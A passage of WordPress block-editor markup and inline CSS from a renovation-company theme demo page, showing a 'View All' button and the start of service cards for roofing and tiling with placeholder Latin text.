-->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"3ad3deef-c09c-435f-9bef-60608e900e64\"} -->\n<style type=\"text/css\"> .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3ad3deef-c09c-435f-9bef-60608e900e64 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3ad3deef-c09c-435f-9bef-60608e900e64\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/\",\"counterId\":\"240ef76e-ed43-4e3f-bfc0-9e8f9301de7c\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"61ff780f-af32-46b2-9e22-40df4790a340\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-61ff780f-af32-46b2-9e22-40df4790a340 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-61ff780f-af32-46b2-9e22-40df4790a340.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-61ff780f-af32-46b2-9e22-40df4790a340 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-61ff780f-af32-46b2-9e22-40df4790a340.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde\"} -->\n<style type=\"text/css\"> .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8dc2ac9e-8c6e-46e5-8f21-63840c3e8cde skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"e09e3d4d-a9bf-4014-b461-dbc47b884dfa\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e09e3d4d-a9bf-4014-b461-dbc47b884dfa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"08934182-4560-4a6c-8515-6f6f806e013c\"} -->\n<style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"af9e4793-906c-4dfa-bbb9-ebc53b817ade\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-af9e4793-906c-4dfa-bbb9-ebc53b817ade\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d\"} -->\n<style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n 